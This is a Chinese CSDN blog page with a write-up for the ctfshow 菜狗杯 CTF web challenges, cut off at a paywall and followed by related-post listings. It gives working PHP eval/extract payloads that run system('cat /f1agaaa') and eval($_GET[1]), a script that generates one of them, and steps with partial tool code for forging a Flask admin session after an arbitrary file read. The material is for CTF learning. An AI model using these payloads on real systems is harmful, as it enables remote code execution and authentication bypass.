ctfshow-菜狗杯-WEB-wp

最新推荐文章于 2024-05-01 02:51:59 发布
最新推荐文章于 2024-05-01 02:51:59 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mmmjjjjjj1996/article/details/127857421
版权
本文详细介绍了ctfshow菜狗杯中的多个WEB挑战,包括文件读取、断言利用、JavaScript源码分析、游戏漏洞利用等,通过payload和exp揭示了解题思路和技巧。
摘要由CSDN通过智能技术生成

文章目录

web1 web签到

题目代码如下:

<?php

error_reporting(0);
highlight_file(__FILE__);

eval($_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]);

payload:

http://d0255dc2-b1c4-4916-95b0-a3cfe0495d40.challenge.ctf.show/?b=c&c[0]=1&c[6][0][7][5][8][0][9][4][4]=system("cat /f1agaaa");
post: a=b
cookie:CTFshow-QQ群:a

web2 c0me_t0_s1gn

查看js,控制台运行g1ve_flag()即可

web3 我的眼里只有$

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-10 17:20:38
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 08:18:37
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


error_reporting(0);
extract($_POST);
eval($$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$_);
highlight_file(__FILE__);

exp:

$str="_=__";
$res="";
echo "_=__&";
for ($i=0; $i < 34; $i++) { 
        $str="_".$str."_";
        echo $str."&";
        if($i==33){
                echo explode("=", $str)[1]."=eval(\$_GET[1]);";
        }
}

payload:

_=__&__=___&___=____&____=_____&_____=______&______=_______&_______=________&________=_________&_________=__________&__________=___________&___________=____________&____________=_____________&_____________=______________&______________=_______________&_______________=________________&________________=_________________&_________________=__________________&__________________=___________________&___________________=____________________&____________________=_____________________&_____________________=______________________&______________________=_______________________&_______________________=________________________&________________________=_________________________&_________________________=__________________________&__________________________=___________________________&___________________________=____________________________&____________________________=_____________________________&_____________________________=______________________________&______________________________=_______________________________&_______________________________=________________________________&________________________________=_________________________________&_________________________________=__________________________________&__________________________________=___________________________________&___________________________________=____________________________________&____________________________________=eval($_GET[1]);

web4 抽老婆

可以发现在/dowload路由下有一个任意文件读取,在debug页面可以看到源码在/app/app.py

获取到源代码发现flask的key,伪造admin的session。

flask_session_cookie_manager3.py工具脚本

#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
最低0.47元/天 解锁文章
陪你等待
关注
专栏目录
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1157
ctfshow-web入门-爆破wp
CTFshow-菜狗杯-Crypto-签到-Caesar-0x36d-类型7
qq_31415417的博客
03-02 1228
CTFshow-菜狗杯-Crypto-签到-Caesar-0x36d-类型7
CTFshow 菜狗杯 web方向 全
Jay17的博客
09-01 3374
CTFshow 菜狗杯 web方向 全
ctfshow(菜狗杯
qq_62046696的博客
11-28 5950
这样的话cookie传入 =a ,然后破石头 a=b ,get b=c,request可以接收post和get请求,最后c因为用数组传参所以要带上后面的东西。这道题其实,看if($arr[]=1)这个等于号,是一个所以这是一个赋值的操作,肯定为true会进行die的操作,所以0=1随便赋值。然后input=加密传参,action=test,但是这里一直没成功,弄了好久才发现+被过滤掉了,需要一层的url 编码。的个数,%4e这样的形式只占用一个字节,是统计 a=%4e统计等号的右边。
CTFSHOW菜狗杯 web
羽的博客
11-13 8932
CTFSHOW web
CTFSHOW 菜狗杯--WEB
weixin_45908624的博客
01-09 3479
CTFShow--菜狗杯--web
ctfshow-菜狗杯-web(一)
qq_47804678的博客
11-30 2819
_REQUEST[c][6][0][7][5][8][0][9][4][4],其中$_REQUEST是以任何一种方式请求都可以,c为数组,$_REQUEST请求中传入的值是取的C数组中ID键为[6][0][7][5][8][0][9][4][4]的值。eval()函数中的还是变量嵌套(刚开始以为只需要传最后一个$_的值就好了,没想到是不停的变量嵌套),注意都到在POST中传入。首先是给$_赋值:_=a,再给$a赋值,a=b······以此类推一共有36个$,需要赋值36次。于是我们用POST形式发包,
CTFshow-菜狗杯-web签到
qq_31415417的博客
12-06 3450
CTFshow参数传递的获取、url编码、eval命令执行 解题思路 先是cookie传参再是POST传参再是GET传参再是REQUEST传参最后是eval命令执行分析链接https://note.youdao.com/ynoteshare/index.html?id=def831ca8bef3926b1cb0e62249d6e88&type=note&_time=1670206729016构造payload 得到flag
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web
2401_84297944的博客
04-28 988
F12。
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
2024年CTFShow-WEB入门篇--信息搜集详细Wp_ctfshow web(1)
最新发布
2401_84252743的博客
05-01 294
版本控制很重要,但不要部署到生产环境更重要。 扫到文件信息泄露了 上面刚说完这就考到了 可以可以 访问即可。版本控制很重要,但不要部署到生产环境更重要。怎么又是这个提示 不会又是 泄露吧 在 扫一下看看 🆗这回是svn信息泄露!是的缩写,是一个开放源代码的版本控制系统使用后,项目目录下会生成隐藏的文件夹 里面包含备份文件 和这个也是一样的。 发现网页有个错别字?赶紧在生产环境改下,不好,死机了上一题刚说这一题提示就来了 就是 直接访问 即可。 只是一块饼干,不能存放任何隐私数据去网络里面找值 编码解码即
ctfshow菜狗杯webwp
qq_63928796的博客
11-14 2213
比如b=cookie[a],所以post[b]然后令post等于c所以get[c],令get=d所以request[d]最后补上前面的数字就是request[d],最后执行的就是eval(d[6][0][7][5][8][0][9][4][4]);可以看到源码对于输入的限制是两个正则,要求要么是数字,要么是dir(gmpy2)中的内容。根据源码可知,address是用AES的ECB模式加密的,稍微查一下就可以知道,ECB模式一组密文对应一组明文,也就是说,可以通过改变密文的顺序从而改变解密后明文的顺序。
CTFshow 2022 菜狗杯部分WEB WP
starttv的博客
11-13 1830
右键发现js源代码,将js代码全部复制下来,放在js在线运行工具里,在最后加上g1ve_flag();访问/secret_path_you_do_not_know/secretfile.txt。extract() 函数从数组中将变量导入到当前的符号表。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。该函数使用数组键名作为变量名,使用数组键值作为变量值。套娃题,自己本地搭环境,慢慢试就试出来了。可以实现任意文件下载,除了flag。把这里的修改即可得到flag。检查源代码发现存在文件下载。
菜狗杯Web签到wp
Altering_Ji的博客
11-17 3581
菜狗杯web签到题wp
ctfshow菜狗杯-web签到题 详细解题过程
a_153161的博客
01-19 1497
ctfshow 菜狗杯web签到题详细解体过程
CTFshow-菜狗杯-茶歇区-小舔田
qq_31415417的博客
02-16 1096
CTFshow-菜狗杯-茶歇区-小舔田
WEB-CTFShow-菜狗杯-我的眼里只有$
qq_31415417的博客
01-02 1228
CTFShow-菜狗杯-我的眼里只有$
ctfshow菜狗杯 web 我的眼里只有$
hypocrite2的博客
05-12 354
load URL、post data打钩、把输出的填空。我先a-z,在A-I,一共26+9 =35个,我这里最后是给I赋值。#这里cat /f1agaaa是打开f1agaaa文件的命令,不懂。生成从变量1到变量35,最后赋给变量35的值为真正想执行的命令。题目有36个$,给出的最后一个$_可以看做变量0。查看目录有一个f1agaaa文件。#这里ls是查看目录文件的命令。#下载未收费的hackbar。#为什么要_=a开头?萌新入坑,防懒细胞滋生。hackbar,混过。
ctfshow 菜狗杯 一言既出 wp
08-19
根据引用,在ctfshow菜狗杯比赛中,需要进行目录遍历,下载一个名为app.py的Python源码文件,并进行JWT解密。然后,需要将其中的一个布尔值false改为true。 根据引用,解压缩文件时,遇到了一个损坏的压缩包提示。通过以二进制方式打开文件,发现文件头是PNG图片的标识。所以,将文件的后缀名改为png。 根据引用,在这个比赛中有一道非常难的题目,做到第30关时,由于容器到期了而无法继续进行。作者只能用手机拍下阴影图,并逐个比对来解决问题。 综上所述,ctfshow菜狗杯比赛中的一言既出题目需要进行目录遍历、下载源码文件、JWT解密和修改布尔值;另外,还需要解决损坏压缩包的问题,并通过手机拍照和比对阴影图来解决困难的题目。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow菜狗杯wp](https://blog.csdn.net/m0_62274649/article/details/127899835)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值